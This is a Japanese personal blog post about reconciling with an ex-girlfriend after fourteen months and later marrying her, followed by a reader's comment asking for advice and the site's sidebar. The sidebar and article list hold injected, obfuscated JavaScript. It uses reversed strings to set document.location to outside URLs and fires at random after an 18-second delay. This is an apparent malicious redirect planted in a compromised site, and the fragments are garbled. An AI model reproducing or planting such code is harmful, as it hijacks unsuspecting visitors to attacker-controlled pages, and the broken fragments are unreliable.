【元カノとの復縁エピソード】ついに復縁成功!原因は自分にあった編

この記事は3分で読めます

こちらの話の続きになっていますので、

ご覧になっていない方は、はじめにこちらからご覧ください↓

【元カノとの復縁体験談】すべてのはじまりはここから

では、続きを話していきます。

 

 

公務員になる夢が破れた今、

何の仕事をしようか・・・。

 

そう考えながら、愛との復縁に励む日々。

この時点で、愛と別れて、一年以上が経過していました。

 

この辺りからでしょうか?

私の気持ちに、変化が生まれてきたのは。

復縁したい気持ちに、変化はありませんでした。

 

 


しかし、愛もひとりの人間。

間違うこともあるし、もう一度付き合っても、

また、他の男に目を向けるかもしれない。

それは、仕方がないことなのもしれない。

 

 

自然と、そう思えるようになったのです。

 

それまでは、復縁したら、今度こそ自分だけを見て欲しい。

もう、私を悲しませるようなことはして欲しくない。

復縁するなら、結婚を前提にして欲しい。

 

そう強く思っていたのです。

自然と、愛に強要していたのです。

 

愛も自分に、自信はなかったのでしょう。

もしかしたら、また私を傷つけてしまうかもしれない。

 

何度も何度も、復縁を、申し込みましたが、

断られる理由は、いつも同じでした。

 

 


「あなたには、幸せになって欲しい。
でも私じゃ、幸せにできないんだよ。」

 

 

私は何度も、愛にしか私を幸せにできない。

そう必死に伝えました。

 

でも、決して愛は、首を縦に振ることはなかったのです。

愛には、自信がなかったのです。

 

 

私のことを誰よりも、大事に思ってくれていたのでしょう。

それだけに、また自分が他の男性へ走ってしまったら・・・。

そう思うと、復縁はできない。

 

もちろん、復縁ドッグへの気持ちも、そこまで、強くなかったのも事実です。

強い気持ちがあれば、そんな条件だって、復縁していますからね…。

そこまでの気持ちがない中で、

 

 

『二度と裏切れない、付き合ったら結婚を前提に考える』

このハードルは、愛にとって、復縁するには、非常に

高いものとなっていたのです。

 

 

だからこそ、誰か、復縁ドッグだけを見てくれる女性が現れるはず。

あなたには、その人に、幸せにしてもらって欲しい。

 

愛の中でも、キリが掛かったような感情だったようですが、

真相心理では、このように考えていたようなのです。

 

 

結局、復縁の邪魔をしていたのは、
私の強烈なエゴでした。

 

 

もう一度、付き合ったら二度と裏切らない。

そんなニュアンスの言葉が、

自然と口に出ていたことに、気がついたのです。

 

私は、愛の世界観を、まったく理解できていなかったのです。

 

愛の世界観を知ることができたことによって、

長く続いた、膠着状態が解けました。

 

 

私は、愛に言いました。

 

 

「先のことなんて分からない。

もしかしたら愛は、また他の男に走るかもしれない。

でも、その間だけでも一緒にいて欲しい。」

 

 

心の底からの、声でした。

 

 

それからです。

愛の心が、再び私に向けられるようになったのは。

メールの頻度が上がっていき、愛からのメールも増えていきました。

 

電話にも出てくれるようになり、

会話も、以前付き合っていた頃のように、明るくなったのです。

今までの均衡状態が、嘘だったかのように、状況が進展していきます。

 

そうです。

愛の心の霧、呪縛が、解けたのです。

 

そして、ついにその日を迎えます。

 

 


「もう一度やり直さない?」

「うん。」

 

 

別れてから、1年2ヵ月後の、年明けのことでした。

 

ドラマのような、カッコイイ結末ではありませんが、

私にとっては、最高のフィナーレでした。

ようやく、私の努力は実ったのです。

本当に、嬉しかったことを覚えています。

 

それからの私達は、私が就職口を見つけ、

仕事も落ち着き、結婚資金も貯まった5年後の秋。

 

私達は、結婚したのです。

結婚とは何か?これが本当の愛情だ編に続く

  • このエントリーをはてなブックマークに追加

関連記事

コメント

    • まうんてん

    こんばんは、夜分すみません。
    7月頭に遠距離の彼に振られました。今年の3月まで大学でほぼ半同棲をしていたのですが、4月からお互い青森と岩手で仕事をし、遠距離になり、職場の年下に誘惑され、このままだとだめだと思ったのか、私が振られました。本人はまだ私が好きと言い、またよりを戻したいが、いまは回り道をさせてと言われました。このまま待っていたいのですが、不安です。先日会ったとき、今までより明るくなった、変わったね。とは言われました。でも、いまは年下の子と付き合いたいとも、言われました。彼とは連絡は極力取らないと、言われました。まだ付き合ってはいないらしいですが、その年下の子になるべく連絡とらないでと、言われたみたいです。待っていたいのは山々なのですが、待っていて彼が返ってこなくて傷つくのはとても辛いのです。このまま待っていても、いいのか。相談したくコメントさせていただきました。

  1. この記事へのトラックバックはありません。

管理人:復縁ドッグ


恋愛レベルの向上なしに復縁はできない!

恋愛レベルの向上なしに夫婦の絆は作れない!

をモットーに、当サイトは運営されています。


1年2ヵ月の歳月を費やし、

自力で復縁に成功した復縁ドッグは

現在、復縁した彼女と結婚し

幸せな家庭を築いています。



→復縁ドッグによる前10回復縁メール講座



→復縁ドッグの10年以上に渡る復縁日記



→復縁に欠かせない基礎知識


youtube動画一覧

おすすめ記事

  1. infodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topで【小澤7step】復縁マニュアルを実際に購入してみた

復縁オンライン講座




【復縁体験で学ぶ③】重い女と言われ振られた!彼彼女の束縛での別れ
元彼元カノと会う約束が!デートをドタキャン!感情コントロール法
【社内恋愛/着信拒否】7stepマニュアル実践者さんの復縁成功例③
元彼元カノとの復縁は第三者友達の協力がないと諦めるべきか?
【復縁エピソード】元カノから連絡が!電話で会いたいと言われた編
$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topで【小澤7step】復縁マニュアルを実際に購入してみた" class="title">info